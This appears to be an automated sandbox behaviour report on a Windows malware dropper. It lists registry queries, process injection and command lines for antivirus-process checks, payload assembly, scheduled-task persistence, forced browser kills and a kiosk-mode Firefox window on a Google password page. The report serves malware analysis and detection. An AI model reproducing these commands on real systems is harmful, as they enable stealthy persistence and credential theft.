Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012579001\d5faa09673.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012579001\d5faa09673.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012580001\32dac93b2c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012580001\32dac93b2c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012581001\dc0bfa7b6f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012581001\dc0bfa7b6f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4776 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 4776 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 4776 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2628 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 2628 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 2628 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 4680 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 4680 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 4680 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 4380 wrote to memory of 2104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4380 wrote to memory of 2104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4380 wrote to memory of 2104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4380 wrote to memory of 3520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4380 wrote to memory of 3520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4380 wrote to memory of 3520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4380 wrote to memory of 3580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4380 wrote to memory of 3580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4380 wrote to memory of 3580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4380 wrote to memory of 4840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4380 wrote to memory of 4840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4380 wrote to memory of 4840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4380 wrote to memory of 4396 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4380 wrote to memory of 4396 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4380 wrote to memory of 4396 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4380 wrote to memory of 3920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4380 wrote to memory of 3920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4380 wrote to memory of 3920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2628 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012579001\d5faa09673.exe
PID 2628 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012579001\d5faa09673.exe
PID 2628 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012579001\d5faa09673.exe
PID 4380 wrote to memory of 5064 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
PID 4380 wrote to memory of 5064 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
PID 4380 wrote to memory of 5064 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
PID 4380 wrote to memory of 4932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 4380 wrote to memory of 4932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 4380 wrote to memory of 4932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 5064 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\SysWOW64\cmd.exe
PID 5064 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\SysWOW64\cmd.exe
PID 5064 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\SysWOW64\cmd.exe
PID 5064 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\SysWOW64\schtasks.exe
PID 5064 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\SysWOW64\schtasks.exe
PID 5064 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\SysWOW64\schtasks.exe
PID 1252 wrote to memory of 2788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1252 wrote to memory of 2788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1252 wrote to memory of 2788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2628 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012580001\32dac93b2c.exe
PID 2628 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012580001\32dac93b2c.exe
PID 2628 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012580001\32dac93b2c.exe
PID 2628 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012581001\dc0bfa7b6f.exe
PID 2628 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012581001\dc0bfa7b6f.exe
PID 2628 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012581001\dc0bfa7b6f.exe
PID 2628 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe
PID 2628 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe
PID 2628 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe
PID 4776 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe C:\Windows\SysWOW64\taskkill.exe
PID 4776 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe C:\Windows\SysWOW64\taskkill.exe
PID 4776 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe C:\Windows\SysWOW64\taskkill.exe
PID 4776 wrote to memory of 4144 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe C:\Windows\SysWOW64\taskkill.exe
PID 4776 wrote to memory of 4144 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe C:\Windows\SysWOW64\taskkill.exe
PID 4776 wrote to memory of 4144 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe C:\Windows\SysWOW64\taskkill.exe
PID 4776 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe C:\Windows\SysWOW64\taskkill.exe
PID 4776 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe C:\Windows\SysWOW64\taskkill.exe
PID 4776 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe C:\Windows\SysWOW64\taskkill.exe
PID 4776 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe C:\Windows\SysWOW64\taskkill.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe

"C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe

"C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 491505

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B

C:\Users\Admin\AppData\Local\Temp\1012579001\d5faa09673.exe

"C:\Users\Admin\AppData\Local\Temp\1012579001\d5faa09673.exe"

C:\Users\Admin\AppData\Local\Temp\491505\Dr.com

Dr.com B

C:\Windows\SysWOW64\choice.exe

choice /d y /t 15

C:\Windows\SysWOW64\cmd.exe

cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST

C:\Users\Admin\AppData\Local\Temp\1012580001\32dac93b2c.exe

"C:\Users\Admin\AppData\Local\Temp\1012580001\32dac93b2c.exe"

C:\Users\Admin\AppData\Local\Temp\1012581001\dc0bfa7b6f.exe

"C:\Users\Admin\AppData\Local\Temp\1012581001\dc0bfa7b6f.exe"

C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe

"C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

